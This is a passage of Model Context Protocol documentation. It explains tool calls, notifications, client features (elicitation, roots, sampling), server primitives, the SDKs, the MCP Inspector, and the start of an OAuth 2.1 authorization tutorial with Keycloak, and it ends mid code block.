When the language model decides to use a tool during a conversation, the AI application intercepts the tool call, routes it to the appropriate MCP server, executes it, and returns the results back to the LLM as part of the conversation flow. This enables the LLM to access real-time data and perform actions in the external world.
```python theme={null}
# Pseudo-code for AI application tool execution
async def handle_tool_call(conversation, tool_name, arguments):
session = app.find_mcp_session_for_tool(tool_name)
result = await session.call_tool(tool_name, arguments)
conversation.add_tool_result(result.content)
```
MCP supports real-time notifications that enable servers to inform clients about changes without being explicitly requested. This demonstrates the notification system, a key feature that keeps MCP connections synchronized and responsive.
#### Understanding Tool List Change Notifications
When the server's available tools change—such as when new functionality becomes available, existing tools are modified, or tools become temporarily unavailable—the server can proactively notify connected clients:
```json Request theme={null}
{
"jsonrpc": "2.0",
"method": "notifications/tools/list_changed"
}
```
#### Key Features of MCP Notifications
1. **No Response Required**: Notice there's no `id` field in the notification. This follows JSON-RPC 2.0 notification semantics where no response is expected or sent.
2. **Capability-Based**: This notification is only sent by servers that declared `"listChanged": true` in their tools capability during initialization (as shown in Step 1).
3. **Event-Driven**: The server decides when to send notifications based on internal state changes, making MCP connections dynamic and responsive.
#### Client Response to Notifications
Upon receiving this notification, the client typically reacts by requesting the updated tool list. This creates a refresh cycle that keeps the client's understanding of available tools current:
```json Request theme={null}
{
"jsonrpc": "2.0",
"id": 4,
"method": "tools/list"
}
```
#### Why Notifications Matter
This notification system is crucial for several reasons:
1. **Dynamic Environments**: Tools may come and go based on server state, external dependencies, or user permissions
2. **Efficiency**: Clients don't need to poll for changes; they're notified when updates occur
3. **Consistency**: Ensures clients always have accurate information about available server capabilities
4. **Real-time Collaboration**: Enables responsive AI applications that can adapt to changing contexts
This notification pattern extends beyond tools to other MCP primitives, enabling comprehensive real-time synchronization between clients and servers.
#### How This Works in AI Applications
When the AI application receives a notification about changed tools, it immediately refreshes its tool registry and updates the LLM's available capabilities. This ensures that ongoing conversations always have access to the most current set of tools, and the LLM can dynamically adapt to new functionality as it becomes available.
```python theme={null}
# Pseudo-code for AI application notification handling
async def handle_tools_changed_notification(session):
tools_response = await session.list_tools()
app.update_available_tools(session, tools_response.tools)
if app.conversation.is_active():
app.conversation.notify_llm_of_new_capabilities()
```
# Understanding MCP clients
Source: https://modelcontextprotocol.io/docs/learn/client-concepts
MCP clients are instantiated by host applications to communicate with particular MCP servers. The host application, like Claude.ai or an IDE, manages the overall user experience and coordinates multiple clients. Each client handles one direct communication with one server.
Understanding the distinction is important: the *host* is the application users interact with, while *clients* are the protocol-level components that enable server connections.
## Core Client Features
In addition to making use of context provided by servers, clients may provide several features to servers. These client features allow server authors to build richer interactions.
| Feature | Explanation | Example |
| --------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------- |
| **Elicitation** | Elicitation enables servers to request specific information from users during interactions, providing a structured way for servers to gather information on demand. | A server booking travel may ask for the user's preferences on airplane seats, room type or their contact number to finalise a booking. |
| **Roots** | Roots allow clients to specify which directories servers should focus on, communicating intended scope through a coordination mechanism. | A server for booking travel may be given access to a specific directory, from which it can read a user's calendar. |
| **Sampling** | Sampling allows servers to request LLM completions through the client, enabling an agentic workflow. This approach puts the client in complete control of user permissions and security measures. | A server for booking travel may send a list of flights to an LLM and request that the LLM pick the best flight for the user. |
### Elicitation
Elicitation enables servers to request specific information from users during interactions, creating more dynamic and responsive workflows.
#### Overview
Elicitation provides a structured way for servers to gather necessary information on demand. Instead of requiring all information up front or failing when data is missing, servers can pause their operations to request specific inputs from users. This creates more flexible interactions where servers adapt to user needs rather than following rigid patterns.
**Elicitation flow:**
```mermaid theme={null}
sequenceDiagram
participant User
participant Client
participant Server
Note over Server,Client: Server initiates elicitation
Server->>Client: elicitation/create
Note over Client,User: Human interaction
Client->>User: Present elicitation UI
User-->>Client: Provide requested information
Note over Server,Client: Complete request
Client-->>Server: Return user response
Note over Server: Continue processing with new information
```
The flow enables dynamic information gathering. Servers can request specific data when needed, users provide information through appropriate UI, and servers continue processing with the newly acquired context.
**Elicitation components example:**
```typescript theme={null}
{
method: "elicitation/requestInput",
params: {
message: "Please confirm your Barcelona vacation booking details:",
schema: {
type: "object",
properties: {
confirmBooking: {
type: "boolean",
description: "Confirm the booking (Flights + Hotel = $3,000)"
},
seatPreference: {
type: "string",
enum: ["window", "aisle", "no preference"],
description: "Preferred seat type for flights"
},
roomType: {
type: "string",
enum: ["sea view", "city view", "garden view"],
description: "Preferred room type at hotel"
},
travelInsurance: {
type: "boolean",
default: false,
description: "Add travel insurance ($150)"
}
},
required: ["confirmBooking"]
}
}
}
```
#### Example: Holiday Booking Approval
A travel booking server demonstrates elicitation's power through the final booking confirmation process. When a user has selected their ideal vacation package to Barcelona, the server needs to gather final approval and any missing details before proceeding.
The server elicits booking confirmation with a structured request that includes the trip summary (Barcelona flights June 15-22, beachfront hotel, total \$3,000) and fields for any additional preferences—such as seat selection, room type, or travel insurance options.
As the booking progresses, the server elicits contact information needed to complete the reservation. It might ask for traveler details for flight bookings, special requests for the hotel, or emergency contact information.
#### User Interaction Model
Elicitation interactions are designed to be clear, contextual, and respectful of user autonomy:
**Request presentation**: Clients display elicitation requests with clear context about which server is asking, why the information is needed, and how it will be used. The request message explains the purpose while the schema provides structure and validation.
**Response options**: Users can provide the requested information through appropriate UI controls (text fields, dropdowns, checkboxes), decline to provide information with optional explanation, or cancel the entire operation. Clients validate responses against the provided schema before returning them to servers.
**Privacy considerations**: Elicitation never requests passwords or API keys. Clients warn about suspicious requests and let users review data before sending.
### Roots
Roots define filesystem boundaries for server operations, allowing clients to specify which directories servers should focus on.
#### Overview
Roots are a mechanism for clients to communicate filesystem access boundaries to servers. They consist of file URIs that indicate directories where servers can operate, helping servers understand the scope of available files and folders. While roots communicate intended boundaries, they do not enforce security restrictions. Actual security must be enforced at the operating system level, via file permissions and/or sandboxing.
**Root structure:**
```json theme={null}
{
"uri": "file:///Users/agent/travel-planning",
"name": "Travel Planning Workspace"
}
```
Roots are exclusively filesystem paths and always use the `file://` URI scheme. They help servers understand project boundaries, workspace organization, and accessible directories. The roots list can be updated dynamically as users work with different projects or folders, with servers receiving notifications through `roots/list_changed` when boundaries change.
#### Example: Travel Planning Workspace
A travel agent working with multiple client trips benefits from roots to organize filesystem access. Consider a workspace with different directories for various aspects of travel planning.
The client provides filesystem roots to the travel planning server:
* `file:///Users/agent/travel-planning` - Main workspace containing all travel files
* `file:///Users/agent/travel-templates` - Reusable itinerary templates and resources
* `file:///Users/agent/client-documents` - Client passports and travel documents
When the agent creates a Barcelona itinerary, well-behaved servers respect these boundaries—accessing templates, saving the new itinerary, and referencing client documents within the specified roots. Servers typically access files within roots by using relative paths from the root directories or by utilizing file search tools that respect the root boundaries.
If the agent opens an archive folder like `file:///Users/agent/archive/2023-trips`, the client updates the roots list via `roots/list_changed`.
For a complete implementation of a server that respects roots, see the [filesystem server](https://github.com/modelcontextprotocol/servers/tree/main/src/filesystem) in the official servers repository.
#### Design Philosophy
Roots serve as a coordination mechanism between clients and servers, not a security boundary. The specification requires that servers "SHOULD respect root boundaries," and not that they "MUST enforce" them, because servers run code the client cannot control.
Roots work best when servers are trusted or vetted, users understand their advisory nature, and the goal is preventing accidents rather than stopping malicious behavior. They excel at context scoping (telling servers where to focus), accident prevention (helping well-behaved servers stay in bounds), and workflow organization (such as managing project boundaries automatically).
#### User Interaction Model
Roots are typically managed automatically by host applications based on user actions, though some applications may expose manual root management:
**Automatic root detection**: When users open folders, clients automatically expose them as roots. Opening a travel workspace allows the client to expose that directory as a root, helping servers understand which itineraries and documents are in scope for the current work.
**Manual root configuration**: Advanced users can specify roots through configuration. For example, adding `/travel-templates` for reusable resources while excluding directories with financial records.
### Sampling
Sampling allows servers to request language model completions through the client, enabling agentic behaviors while maintaining security and user control.
#### Overview
Sampling enables servers to perform AI-dependent tasks without directly integrating with or paying for AI models. Instead, servers can request that the client—which already has AI model access—handle these tasks on their behalf. This approach puts the client in complete control of user permissions and security measures. Because sampling requests occur within the context of other operations—like a tool analyzing data—and are processed as separate model calls, they maintain clear boundaries between different contexts, allowing for more efficient use of the context window.
**Sampling flow:**
```mermaid theme={null}
sequenceDiagram
participant LLM
participant User
participant Client
participant Server
Note over Server,Client: Server initiates sampling
Server->>Client: sampling/createMessage
Note over Client,User: Human-in-the-loop review
Client->>User: Present request for approval
User-->>Client: Review and approve/modify
Note over Client,LLM: Model interaction
Client->>LLM: Forward approved request
LLM-->>Client: Return generation
Note over Client,User: Response review
Client->>User: Present response for approval
User-->>Client: Review and approve/modify
Note over Server,Client: Complete request
Client-->>Server: Return approved response
```
The flow ensures security through multiple human-in-the-loop checkpoints. Users review and can modify both the initial request and the generated response before it returns to the server.
**Request parameters example:**
```typescript theme={null}
{
messages: [
{
role: "user",
content: "Analyze these flight options and recommend the best choice:\n" +
"[47 flights with prices, times, airlines, and layovers]\n" +
"User preferences: morning departure, max 1 layover"
}
],
modelPreferences: {
hints: [{
name: "claude-sonnet-4-20250514" // Suggested model
}],
costPriority: 0.3, // Less concerned about API cost
speedPriority: 0.2, // Can wait for thorough analysis
intelligencePriority: 0.9 // Need complex trade-off evaluation
},
systemPrompt: "You are a travel expert helping users find the best flights based on their preferences",
maxTokens: 1500
}
```
#### Example: Flight Analysis Tool
Consider a travel booking server with a tool called `findBestFlight` that uses sampling to analyze available flights and recommend the optimal choice. When a user asks "Book me the best flight to Barcelona next month," the tool needs AI assistance to evaluate complex trade-offs.
The tool queries airline APIs and gathers 47 flight options. It then requests AI assistance to analyze these options: "Analyze these flight options and recommend the best choice: \[47 flights with prices, times, airlines, and layovers] User preferences: morning departure, max 1 layover."
The client initiates the sampling request, allowing the AI to evaluate trade-offs—like cheaper red-eye flights versus convenient morning departures. The tool uses this analysis to present the top three recommendations.
#### User Interaction Model
While not a requirement, sampling is designed to allow human-in-the-loop control. Users can maintain oversight through several mechanisms:
**Approval controls**: Sampling requests may require explicit user consent. Clients can show what the server wants to analyze and why. Users can approve, deny, or modify requests.
**Transparency features**: Clients can display the exact prompt, model selection, and token limits, allowing users to review AI responses before they return to the server.
**Configuration options**: Users can set model preferences, configure auto-approval for trusted operations, or require approval for everything. Clients may provide options to redact sensitive information.
**Security considerations**: Both clients and servers must handle sensitive data appropriately during sampling. Clients should implement rate limiting and validate all message content. The human-in-the-loop design ensures that server-initiated AI interactions cannot compromise security or access sensitive data without explicit user consent.
# Understanding MCP servers
Source: https://modelcontextprotocol.io/docs/learn/server-concepts
MCP servers are programs that expose specific capabilities to AI applications through standardized protocol interfaces.
Common examples include file system servers for document access, database servers for data queries, GitHub servers for code management, Slack servers for team communication, and calendar servers for scheduling.
## Core Server Features
Servers provide functionality through three building blocks:
| Feature | Explanation | Examples | Who controls it |
| ------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------ | --------------- |
| **Tools** | Functions that your LLM can actively call, and decides when to use them based on user requests. Tools can write to databases, call external APIs, modify files, or trigger other logic. | Search flights Send messages Create calendar events | Model |
| **Resources** | Passive data sources that provide read-only access to information for context, such as file contents, database schemas, or API documentation. | Retrieve documents Access knowledge bases Read calendars | Application |
| **Prompts** | Pre-built instruction templates that tell the model to work with specific tools and resources. | Plan a vacation Summarize my meetings Draft an email | User |
We will use a hypothetical scenario to demonstrate the role of each of these features, and show how they can work together.
### Tools
Tools enable AI models to perform actions. Each tool defines a specific operation with typed inputs and outputs. The model requests tool execution based on context.
#### How Tools Work
Tools are schema-defined interfaces that LLMs can invoke. MCP uses JSON Schema for validation. Each tool performs a single operation with clearly defined inputs and outputs. Tools may require user consent prior to execution, helping to ensure users maintain control over actions taken by a model.
**Protocol operations:**
| Method | Purpose | Returns |
| ------------ | ------------------------ | -------------------------------------- |
| `tools/list` | Discover available tools | Array of tool definitions with schemas |
| `tools/call` | Execute a specific tool | Tool execution result |
**Example tool definition:**
```typescript theme={null}
{
name: "searchFlights",
description: "Search for available flights",
inputSchema: {
type: "object",
properties: {
origin: { type: "string", description: "Departure city" },
destination: { type: "string", description: "Arrival city" },
date: { type: "string", format: "date", description: "Travel date" }
},
required: ["origin", "destination", "date"]
}
}
```
#### Example: Travel Booking
Tools enable AI applications to perform actions on behalf of users. In a travel planning scenario, the AI application might use several tools to help book a vacation:
**Flight Search**
```
searchFlights(origin: "NYC", destination: "Barcelona", date: "2024-06-15")
```
Queries multiple airlines and returns structured flight options.
**Calendar Blocking**
```
createCalendarEvent(title: "Barcelona Trip", startDate: "2024-06-15", endDate: "2024-06-22")
```
Marks the travel dates in the user's calendar.
**Email notification**
```
sendEmail(to: "team@work.com", subject: "Out of Office", body: "...")
```
Sends an automated out-of-office message to colleagues.
#### User Interaction Model
Tools are model-controlled, meaning AI models can discover and invoke them automatically. However, MCP emphasizes human oversight through several mechanisms.
For trust and safety, applications can implement user control through various mechanisms, such as:
* Displaying available tools in the UI, enabling users to define whether a tool should be made available in specific interactions
* Approval dialogs for individual tool executions
* Permission settings for pre-approving certain safe operations
* Activity logs that show all tool executions with their results
### Resources
Resources provide structured access to information that the AI application can retrieve and provide to models as context.
#### How Resources Work
Resources expose data from files, APIs, databases, or any other source that an AI needs to understand context. Applications can access this information directly and decide how to use it - whether that's selecting relevant portions, searching with embeddings, or passing it all to the model.
Each resource has a unique URI (e.g., `file:///path/to/document.md`) and declares its MIME type for appropriate content handling.
Resources support two discovery patterns:
* **Direct Resources** - fixed URIs that point to specific data. Example: `calendar://events/2024` - returns calendar availability for 2024
* **Resource Templates** - dynamic URIs with parameters for flexible queries. Example:
* `travel://activities/{city}/{category}` - returns activities by city and category
* `travel://activities/barcelona/museums` - returns all museums in Barcelona
Resource Templates include metadata such as title, description, and expected MIME type, making them discoverable and self-documenting.
**Protocol operations:**
| Method | Purpose | Returns |
| -------------------------- | ------------------------------- | -------------------------------------- |
| `resources/list` | List available direct resources | Array of resource descriptors |
| `resources/templates/list` | Discover resource templates | Array of resource template definitions |
| `resources/read` | Retrieve resource contents | Resource data with metadata |
| `resources/subscribe` | Monitor resource changes | Subscription confirmation |
#### Example: Getting Travel Planning Context
Continuing with the travel planning example, resources provide the AI application with access to relevant information:
* **Calendar data** (`calendar://events/2024`) - Checks user availability
* **Travel documents** (`file:///Documents/Travel/passport.pdf`) - Accesses important documents
* **Previous itineraries** (`trips://history/barcelona-2023`) - References past trips and preferences
The AI application retrieves these resources and decides how to process them, whether selecting a subset of data using embeddings or keyword search, or passing raw data directly to the model.
In this case, it provides calendar data, weather information, and travel preferences to the model, enabling it to check availability, look up weather patterns, and reference past travel preferences.
**Resource Template Examples:**
```json theme={null}
{
"uriTemplate": "weather://forecast/{city}/{date}",
"name": "weather-forecast",
"title": "Weather Forecast",
"description": "Get weather forecast for any city and date",
"mimeType": "application/json"
}
{
"uriTemplate": "travel://flights/{origin}/{destination}",
"name": "flight-search",
"title": "Flight Search",
"description": "Search available flights between cities",
"mimeType": "application/json"
}
```
These templates enable flexible queries. For weather data, users can access forecasts for any city/date combination. For flights, they can search routes between any two airports. When a user has input "NYC" as the `origin` airport and begins to input "Bar" as the `destination` airport, the system can suggest "Barcelona (BCN)" or "Barbados (BGI)".
#### Parameter Completion
Dynamic resources support parameter completion. For example:
* Typing "Par" as input for `weather://forecast/{city}` might suggest "Paris" or "Park City"
* Typing "JFK" for `flights://search/{airport}` might suggest "JFK - John F. Kennedy International"
The system helps discover valid values without requiring exact format knowledge.
#### User Interaction Model
Resources are application-driven, giving them flexibility in how they retrieve, process, and present available context. Common interaction patterns include:
* Tree or list views for browsing resources in familiar folder-like structures
* Search and filter interfaces for finding specific resources
* Automatic context inclusion or smart suggestions based on heuristics or AI selection
* Manual or bulk selection interfaces for including single or multiple resources
Applications are free to implement resource discovery through any interface pattern that suits their needs. The protocol doesn't mandate specific UI patterns, allowing for resource pickers with preview capabilities, smart suggestions based on current conversation context, bulk selection for including multiple resources, or integration with existing file browsers and data explorers.
### Prompts
Prompts provide reusable templates. They allow MCP server authors to provide parameterized prompts for a domain, or showcase how to best use the MCP server.
#### How Prompts Work
Prompts are structured templates that define expected inputs and interaction patterns. They are user-controlled, requiring explicit invocation rather than automatic triggering. Prompts can be context-aware, referencing available resources and tools to create comprehensive workflows. Similar to resources, prompts support parameter completion to help users discover valid argument values.
**Protocol operations:**
| Method | Purpose | Returns |
| -------------- | -------------------------- | ------------------------------------- |
| `prompts/list` | Discover available prompts | Array of prompt descriptors |
| `prompts/get` | Retrieve prompt details | Full prompt definition with arguments |
#### Example: Streamlined Workflows
Prompts provide structured templates for common tasks. In the travel planning context:
**"Plan a vacation" prompt:**
```json theme={null}
{
"name": "plan-vacation",
"title": "Plan a vacation",
"description": "Guide through vacation planning process",
"arguments": [
{ "name": "destination", "type": "string", "required": true },
{ "name": "duration", "type": "number", "description": "days" },
{ "name": "budget", "type": "number", "required": false },
{ "name": "interests", "type": "array", "items": { "type": "string" } }
]
}
```
Rather than unstructured natural language input, the prompt system enables:
1. Selection of the "Plan a vacation" template
2. Structured input: Barcelona, 7 days, \$3000, \["beaches", "architecture", "food"]
3. Consistent workflow execution based on the template
#### User Interaction Model
Prompts are user-controlled, requiring explicit invocation. The protocol gives implementers freedom to design interfaces that feel natural within their application. Key principles include:
* Easy discovery of available prompts
* Clear descriptions of what each prompt does
* Natural argument input with validation
* Transparent display of the prompt's underlying template
Applications typically expose prompts through various UI patterns such as:
* Slash commands (typing "/" to see available prompts like /plan-vacation)
* Command palettes for searchable access
* Dedicated UI buttons for frequently used prompts
* Context menus that suggest relevant prompts
## Bringing Servers Together
The real power of MCP emerges when multiple servers work together, combining their specialized capabilities through a unified interface.
### Example: Multi-Server Travel Planning
Consider a personalized AI travel planner application, with three connected servers:
* **Travel Server** - Handles flights, hotels, and itineraries
* **Weather Server** - Provides climate data and forecasts
* **Calendar/Email Server** - Manages schedules and communications
#### The Complete Flow
1. **User invokes a prompt with parameters:**
```json theme={null}
{
"prompt": "plan-vacation",
"arguments": {
"destination": "Barcelona",
"departure_date": "2024-06-15",
"return_date": "2024-06-22",
"budget": 3000,
"travelers": 2
}
}
```
2. **User selects resources to include:**
* `calendar://my-calendar/June-2024` (from Calendar Server)
* `travel://preferences/europe` (from Travel Server)
* `travel://past-trips/Spain-2023` (from Travel Server)
3. **AI processes the request using tools:**
The AI first reads all selected resources to gather context - identifying available dates from the calendar, learning preferred airlines and hotel types from travel preferences, and discovering previously enjoyed locations from past trips.
Using this context, the AI then executes a series of Tools:
* `searchFlights()` - Queries airlines for NYC to Barcelona flights
* `checkWeather()` - Retrieves climate forecasts for travel dates
The AI then uses this information to create the booking and following steps, requesting approval from the user where necessary:
* `bookHotel()` - Finds hotels within the specified budget
* `createCalendarEvent()` - Adds the trip to the user's calendar
* `sendEmail()` - Sends confirmation with trip details
**The result:** Through multiple MCP servers, the user researched and booked a Barcelona trip tailored to their schedule. The "Plan a Vacation" prompt guided the AI to combine Resources (calendar availability and travel history) with Tools (searching flights, booking hotels, updating calendars) across different servers—gathering context and executing the booking. A task that could have taken hours was completed in minutes using MCP.
# SDKs
Source: https://modelcontextprotocol.io/docs/sdk
Official SDKs for building with Model Context Protocol
Build MCP servers and clients using our official SDKs. SDKs are classified into tiers based on feature completeness, protocol support, and maintenance commitment. Learn more about [SDK tiers](/community/sdk-tiers).
## Available SDKs
## Getting Started
Each SDK provides the same functionality but follows the idioms and best practices of its language. All SDKs support:
* Creating MCP servers that expose tools, resources, and prompts
* Building MCP clients that can connect to any MCP server
* Local and remote transport protocols
* Protocol compliance with type safety
Visit the SDK page for your chosen language to find installation instructions, documentation, and examples.
## Next Steps
Ready to start building with MCP? Choose your path:
Learn how to create your first MCP server
Create applications that connect to MCP servers
# MCP Inspector
Source: https://modelcontextprotocol.io/docs/tools/inspector
In-depth guide to using the MCP Inspector for testing and debugging Model Context Protocol servers
The [MCP Inspector](https://github.com/modelcontextprotocol/inspector) is an interactive developer tool for testing and debugging MCP servers. While the [Debugging Guide](/legacy/tools/debugging) covers the Inspector as part of the overall debugging toolkit, this document provides a detailed exploration of the Inspector's features and capabilities.
## Getting started
### Installation and basic usage
The Inspector runs directly through `npx` without requiring installation:
```bash theme={null}
npx @modelcontextprotocol/inspector
```
```bash theme={null}
npx @modelcontextprotocol/inspector
```
#### Inspecting servers from npm or PyPI
A common way to start server packages from [npm](https://npmjs.com) or [PyPI](https://pypi.org).
```bash theme={null}
npx -y @modelcontextprotocol/inspector npx
# For example
npx -y @modelcontextprotocol/inspector npx @modelcontextprotocol/server-filesystem /Users/username/Desktop
```
```bash theme={null}
npx @modelcontextprotocol/inspector uvx
# For example
npx @modelcontextprotocol/inspector uvx mcp-server-git --repository ~/code/mcp/servers.git
```
#### Inspecting locally developed servers
To inspect servers locally developed or downloaded as a repository, the most common
way is:
```bash theme={null}
npx @modelcontextprotocol/inspector node path/to/server/index.js args...
```
```bash theme={null}
npx @modelcontextprotocol/inspector \
uv \
--directory path/to/server \
run \
package-name \
args...
```
Please carefully read any attached README for the most accurate instructions.
## Feature overview
The Inspector provides several features for interacting with your MCP server:
### Server connection pane
* Allows selecting the [transport](/legacy/concepts/transports) for connecting to the server
* For local servers, supports customizing the command-line arguments and environment
### Resources tab
* Lists all available resources
* Shows resource metadata (MIME types, descriptions)
* Allows resource content inspection
* Supports subscription testing
### Prompts tab
* Displays available prompt templates
* Shows prompt arguments and descriptions
* Enables prompt testing with custom arguments
* Previews generated messages
### Tools tab
* Lists available tools
* Shows tool schemas and descriptions
* Enables tool testing with custom inputs
* Displays tool execution results
### Notifications pane
* Presents all logs recorded from the server
* Shows notifications received from the server
## Best practices
### Development workflow
1. Start Development
* Launch Inspector with your server
* Verify basic connectivity
* Check capability negotiation
2. Iterative testing
* Make server changes
* Rebuild the server
* Reconnect the Inspector
* Test affected features
* Monitor messages
3. Test edge cases
* Invalid inputs
* Missing prompt arguments
* Concurrent operations
* Verify error handling and error responses
## Next steps
Check out the MCP Inspector source code
Learn about broader debugging strategies
# Understanding Authorization in MCP
Source: https://modelcontextprotocol.io/docs/tutorials/security/authorization
Learn how to implement secure authorization for MCP servers using OAuth 2.1 to protect sensitive resources and operations
Authorization in the Model Context Protocol (MCP) secures access to sensitive resources and operations exposed by MCP servers. If your MCP server handles user data or administrative actions, authorization ensures only permitted users can access its endpoints.
MCP uses standardized authorization flows to build trust between MCP clients and MCP servers. Its design doesn't focus on one specific authorization or identity system, but rather follows the conventions outlined for [OAuth 2.1](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-1-13). For detailed information, see the [Authorization specification](/specification/latest/basic/authorization).
## When Should You Use Authorization?
While authorization for MCP servers is **optional**, it is strongly recommended when:
* Your server accesses user-specific data (emails, documents, databases)
* You need to audit who performed which actions
* Your server grants access to its APIs that require user consent
* You're building for enterprise environments with strict access controls
* You want to implement rate limiting or usage tracking per user
**Authorization for Local MCP Servers**
For MCP servers using the [STDIO transport](/specification/latest/basic/transports#stdio), you can use environment-based credentials or credentials provided by third-party libraries embedded directly in the MCP server instead. Because a STDIO-built MCP server runs locally, it has access to a range of flexible options when it comes to acquiring user credentials that may or may not rely on in-browser authentication and authorization flows.
OAuth flows, in turn, are designed for HTTP-based transports where the MCP server is remotely-hosted and the client uses OAuth to establish that a user is authorized to access said remote server.
## The Authorization Flow: Step by Step
Let's walk through what happens when a client wants to connect to your protected MCP server:
When your MCP client first tries to connect, your server responds with a `401 Unauthorized` and tells the client where to find authorization information, captured in a [Protected Resource Metadata (PRM) document](https://datatracker.ietf.org/doc/html/rfc9728). The document is hosted by the MCP server, follows a predictable path pattern, and is provided to the client in the `resource_metadata` parameter within the `WWW-Authenticate` header.
```http theme={null}
HTTP/1.1 401 Unauthorized
WWW-Authenticate: Bearer realm="mcp",
resource_metadata="https://your-server.com/.well-known/oauth-protected-resource"
```
This tells the client that authorization is required for the MCP server and where to get the necessary information to kickstart the authorization flow.
With the URI pointer to the PRM document, the client will fetch the metadata to learn about the authorization server, supported scopes, and other resource information. The data is typically encapsulated in a JSON blob, similar to the one below.
```json theme={null}
{
"resource": "https://your-server.com/mcp",
"authorization_servers": ["https://auth.your-server.com"],
"scopes_supported": ["mcp:tools", "mcp:resources"]
}
```
You can see a more comprehensive example in [RFC 9728 Section 3.2](https://datatracker.ietf.org/doc/html/rfc9728#name-protected-resource-metadata-r).
Next, the client discovers what the authorization server can do by fetching its metadata. If the PRM document lists more than one authorization server, the client can decide which one to use.
With an authorization server selected, the client will then construct a standard metadata URI and issue a request to the [OpenID Connect (OIDC) Discovery](https://openid.net/specs/openid-connect-discovery-1_0.html) or [OAuth 2.0 Auth Server Metadata](https://datatracker.ietf.org/doc/html/rfc8414) endpoints (depending on authorization server support)
and retrieve another set of metadata properties that will allow it to know the endpoints it needs to complete the authorization flow.
```json theme={null}
{
"issuer": "https://auth.your-server.com",
"authorization_endpoint": "https://auth.your-server.com/authorize",
"token_endpoint": "https://auth.your-server.com/token",
"registration_endpoint": "https://auth.your-server.com/register"
}
```
With all the metadata out of the way, the client now needs to make sure that it's registered with the authorization server. This can be done in two ways.
First, the client can be **pre-registered** with a given authorization server, in which case it can have embedded client registration information that it uses to complete the authorization flow.
Alternatively, the client can use **Dynamic Client Registration** (DCR) to dynamically register itself with the authorization server. The latter scenario requires the authorization server to support DCR. If the authorization server does support DCR, the client will send a request to the `registration_endpoint` with its information:
```json theme={null}
{
"client_name": "My MCP Client",
"redirect_uris": ["http://localhost:3000/callback"],
"grant_types": ["authorization_code", "refresh_token"],
"response_types": ["code"]
}
```
If the registration succeeds, the authorization server will return a JSON blob with client registration information.
**No DCR or Pre-Registration**
In case an MCP client connects to an MCP server that doesn't use an authorization server that supports DCR and the client is not pre-registered with said authorization server, it's the responsibility of the client developer to provide an affordance for the end-user to enter client information manually.
The client will now need to open a browser to the `/authorize` endpoint, where the user can log in and grant the required permissions. The authorization server will then redirect back to the client with an authorization code that the client exchanges for tokens:
```json theme={null}
{
"access_token": "eyJhbGciOiJSUzI1NiIs...",
"refresh_token": "def502...",
"token_type": "Bearer",
"expires_in": 3600
}
```
The access token is what the client will use to authenticate requests to the MCP server. This step follows standard [OAuth 2.1 authorization code with PKCE](https://oauth.net/2/grant-types/authorization-code/) conventions.
Finally, the client can make requests to your MCP server using the access token embedded in the `Authorization` header:
```http theme={null}
GET /mcp HTTP/1.1
Host: your-server.com
Authorization: Bearer eyJhbGciOiJSUzI1NiIs...
```
The MCP server will need to validate the token and process the request if the token is valid and has the required permissions.
## Implementation Example
To get started with a practical implementation, we will use a [Keycloak](https://www.keycloak.org/) authorization server hosted in a Docker container. Keycloak is an open-source authorization server that can be easily deployed locally for testing and experimentation.
Make sure that you download and install [Docker Desktop](https://www.docker.com/products/docker-desktop/). We will need it to deploy Keycloak on our development machine.
### Keycloak Setup
From your terminal application, run the following command to start the Keycloak container:
```bash theme={null}
docker run -p 127.0.0.1:8080:8080 -e KC_BOOTSTRAP_ADMIN_USERNAME=admin -e KC_BOOTSTRAP_ADMIN_PASSWORD=admin quay.io/keycloak/keycloak start-dev
```
This command will pull the Keycloak container image locally and bootstrap the basic configuration. It will run on port `8080` and have an `admin` user with `admin` password.
**Not for Production**
The configuration above may be suitable for testing and experimentation; however, you should never use it in production. Refer to the [Configuring Keycloak for production](https://www.keycloak.org/server/configuration-production) guide for additional details on how to deploy the authorization server for scenarios that require reliability, security, and high availability.
You will be able to access the Keycloak authorization server from your browser at `http://localhost:8080`.
When running with the default configuration, Keycloak will already support many of the capabilities that we need for MCP servers, including Dynamic Client Registration. You can check this by looking at the OIDC configuration, available at:
```http theme={null}
http://localhost:8080/realms/master/.well-known/openid-configuration
```
We will also need to set up Keycloak to support our scopes and allow our host (local machine) to dynamically register clients, as the default policies restrict anonymous dynamic client registration.
Go to **Client scopes** in the Keycloak dashboard and create a new `mcp:tools` scope. We will use this to access all of the tools on our MCP server.
After creating the scope, make sure that you assign its type to **Default** and have flipped the **Include in token scope** switch, as this will be needed for token validation.
Let's now also set up an **audience** for our Keycloak-issued tokens. An audience is important to configure because it embeds the intended destination directly into the issued access token. This helps your MCP server to verify that the token it got was actually meant for it rather than some other API. This is key to help avoid token passthrough scenarios.
To do this, open your `mcp:tools` client scope and click on **Mappers**, followed by **Configure a new mapper**. Select **Audience**.
For **Name**, use `audience-config`. Add a value for **Included Custom Audience**, set to `http://localhost:3000`. This will be the URI of our test server.
**Not for Production**
The audience configuration above is meant for testing. For production scenarios, additional set-up and configuration will be required to ensure that audiences are properly constrained for issued tokens. Specifically, the audience needs to be based on the resource parameter passed from the client, not a fixed value.
Now, navigate to **Clients**, then **Client registration**, and then **Trusted Hosts**. Disable the **Client URIs Must Match** setting and add the hosts from which you're testing. You can get your current host IP by running the `ifconfig` command on Linux or macOS, or `ipconfig` on Windows. You can see the IP address you need to add by looking at the keycloak logs for a line that looks like `Failed to verify remote host : 192.168.215.1`. Check that the IP address is associated with your host. This may be for a bridge network depending on your docker setup.
**Getting the Host**
If you are running Keycloak from a container, you will also be able to see the host IP from the Terminal in the container logs.
Lastly, we need to register a new client that we can use with the **MCP server itself** to talk to Keycloak for things like [token introspection](https://oauth.net/2/token-introspection/). To do that:
1. Go to **Clients**.
2. Click **Create client**.
3. Give your client a unique **Client ID** and click **Next**.
4. Enable **Client authentication** and click **Next**.
5. Click **Save**.
Worth noting that token introspection is just *one of* the available approaches to validate tokens. This can also be done with the help of standalone libraries, specific to each language and platform.
When you open the client details, go to **Credentials** and take note of the **Client Secret**.
**Handling Secrets**
Never embed client credentials directly in your code. We recommend using environment variables or specialized solutions for secret storage.
With Keycloak configured, every time the authorization flow is triggered, your MCP server will receive a token like this:
```text theme={null}
